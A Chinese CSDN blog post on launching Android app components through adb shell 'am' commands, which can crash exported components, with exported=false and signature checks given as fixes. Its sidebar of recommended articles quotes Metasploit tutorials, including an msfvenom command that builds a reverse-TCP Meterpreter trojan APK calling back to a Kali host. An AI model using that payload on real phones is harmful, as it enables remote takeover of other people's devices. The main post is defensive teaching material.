Android应用安全之ADB攻击

最新推荐文章于 2023-08-03 13:15:35 发布
最新推荐文章于 2023-08-03 13:15:35 发布
阅读量1.1k 收藏
点赞数
分类专栏: Android 开发 文章标签: android android应用 shell 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/itheimach/article/details/54931939
版权

ADB启动四大组件

通过adb shell命令可以启动跳转activity,启动service,或者发送广播broadcast等!通过该方式(与隐式启动类似)启动对于有传值的组件,不传值或者不对应传值可能造成我们的应用崩溃,或者出现错误信息,有可能产生严重的后果!在我们的程序中需要避免!

启动命令

发送广播,action为xxxx
am broadcast -a xxxx

传递int,string值
am broadcast -a xxxx --ei dataType 
am broadcast -a xxxx --ei dataType 0 --es test "test"


启动Activity
 am start -n 包名/全类名

 am start -n com.xxxx/com.xxxx.Activity

退出app
 am force-stop 包名

启动一个服务(export为true才能启动)
am startservice -n 包名/全类名

杀死服务
am stopservice 包名/全类名

解决

解决办法如下:

1.设置组件外部不可调用,在清单文件设置export=false
2.对于需要外部调用(export=true)的情况,需要传值的,可以对应用签名认证(.....),然后进行逻辑判断!
永远的红姐
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[车联网安全自学篇] Android安全之Broadcast Receivers攻防
橙留香Park的博客
04-11 4982
Broadcast Receivers 是对广播接收和回应的组件。系统会发出许多广播,比如时区的改变、电量过低,图片被选中等。应用也可生成广播,比如通知其他设备一些数据已经下载完成并且可以被使用Broadcast Receiver 是 Android 定义的四大组件之一,它没有界面,通常用来处理系统级事件,例如它可以启动一个界面作为对广播的回应,或者使用NotificationManager提示用户。NotificationManager可以通过多种方式提示用户,比如闪烁背光灯,震动设备,播放提示音等等。.
android安全基础知识学习
LJFYYJ的博客
07-25 1606
android Dalvik层和Native层逆向 JEB静态分析、动态调试 IDA静态分析、动态调试
利用ADB和Settings命令行工具轻松的攻击Android手机
howellzhu的专栏
01-27 7922
从4.2开始,Android提供了一个工具settings。这个命令行工具用于帮助构造SettingProvider的客户端代理,从而可以方便的进行设置项的读取和设置。利用adb执行该程序,拥有shell权限,可以偷偷修改很多敏感设置项,从而从PC端对Android手机发起攻击
[免费专栏] ATTACK安全之检测车机中ADB远程调试控制Android系统攻击
橙留香Park的博客
08-22 2217
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ...
kali渗透安卓手机实战案例
最新发布
weixin_51525416的博客
08-03 5247
/ -p:指定有效载荷:可以安装在安卓环境下并执行 LHOST:指定kali自身ip LPORT:端口设置 R;​ kali设置好侦听,在主机以及端口8848上进行侦听,一旦目标安卓手机发送会话,这段程序会将载荷发送过去用于控制对方手机。这时候我们打开kail自带的文件系统,找到hack.apk文件并发送到安卓靶机上。此时,已经在kali环境中创建了一个.apk的木马程序。//打开metasploit渗透框架。run执行渗透攻击,等待主机上线。
kali linux入侵安卓7.0,【教程】metasploit入侵安卓手机
weixin_29232507的博客
05-13 6324
metasploit入侵安卓手机拿shellKALI IP: 192.168.194.1281.生成木马文件msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.194.128 LPORT=5555 R > /root/ma.apk// LHOST = KALI IP 。LPORT = 接收的端口 。 /root/ma.apk...
利用MSF攻击Android
qq_45746768的博客
07-08 3789
利用Metasploit攻击Android
Android应用源码之图案解锁.zip
10-14
这份"Android应用源码之图案解锁.zip"包含了一个实现这一功能的Android应用的源代码。下面将详细探讨相关知识点。 1. **图案解锁原理** - 图案解锁基于Android系统的`LockPatternView`类,这是一个自定义视图,...
adb 1.0.31版本
07-08
在1.0.31版本中,adb可能包含了一些新的特性和改进,使得开发者能更高效地进行Android应用的开发、测试和故障排查。 1. **adb简介** ADB主要由三部分组成:服务器端(运行在开发机上),守护进程(运行在Android...
android安全测试,apktool工具使用
05-27
4. **日志安全**:Android应用的日志信息可能会泄漏敏感数据。通过`adb shell`命令,如`adb logcat`,可以捕获应用日志。开发者应避免在日志中记录敏感信息。 5. **本地数据安全**:应用的本地数据存储在app的私有...
Android安全漏洞挖掘技术综述.pdf
09-21
3. Android Debug Bridge (ADB):用于调试和测试 Android 应用的工具。 在 Android 应用开发中,安全漏洞挖掘技术是非常重要的一部分。开发者需要掌握相关的安全知识和技术,避免漏洞的出现,保护用户隐私和数据...
Android应用源码之手机抓包相关工具.zip
10-14
Android应用中,SSL Pinning是一种增强安全性的做法,防止中间人攻击。然而,这也会阻碍抓包工具获取HTTPS流量。开发者可以利用如Frida等工具绕过SSL Pinning,以便于调试和测试。 七、mitmproxy mitmproxy是一个...
[免费专栏] Android安全ADB命令总结「收藏版」
橙留香Park的博客
08-08 1512
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ...
Android安全入门
weixin_43047908的博客
08-10 555
目录Android简介深入了解 Android沙箱和权限模型应用签名Android 启动流程 Android简介 自从 Android 被谷歌收购(2005 年),谷歌已经完成了整个开发,在过去的 9 年里,尤其是在安全方面,有很多变化。 现在,它是世界上最广泛使用的智能手机平台,特别是由于不同的手机制造商,如 LG,三星,索尼和 HTC 的支持。 Android 的后续版本中引入了许多新概念,例如 Google Bouncer 和 Google App Verifier。 我们将在本章逐一介绍它们。 如果
Android安全adb汇总
Juruo@Security
08-13 383
adb 汇总
adb backup安全漏洞
HHH's Blogs
08-10 761
https://blog.csdn.net/dxymoon/article/details/37728761
android攻击手段
老王的智能终端安全专栏
06-20 1627
A Survey of Current Android Attacks 这篇文献写了android攻击手段,写的还是有点糙哈! 里面有价值的简单列举一下,先吐槽CSDN无法直接黏贴图片,太费劲了!附件也不能上传? 安全分事前-事中-事后。 android由于其产业链的关系,导致除了问题漏洞也无法得到有效的更新!就好比一个很强大的人得个感冒也由于拖延最后无药可治,就是悲剧。 看下图的pat
Adb Shell 安全
androidsecurity01的博客
03-28 1341
1,  adb shell具有丰富的系统权限,所以拥有shell id的应用可以执行很多动作,在JB版本,给shell id赋予了很多权限。 http://androidxref.com/4.1.1/xref/frameworks/base/data/etc/platform.xml 113    114    assign-permission name="android.permiss
xdef2014-flanker-Android应用漏洞攻与防1
08-04
这篇资料主要探讨了Android应用安全问题,特别是从攻击和防御的角度。报告由Flanker(何淇丹)代表KEEN团队进行,内容包括Android应用漏洞的定义、分类、检测方法以及其产生的原因。 首先,Android应用漏洞被定义...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值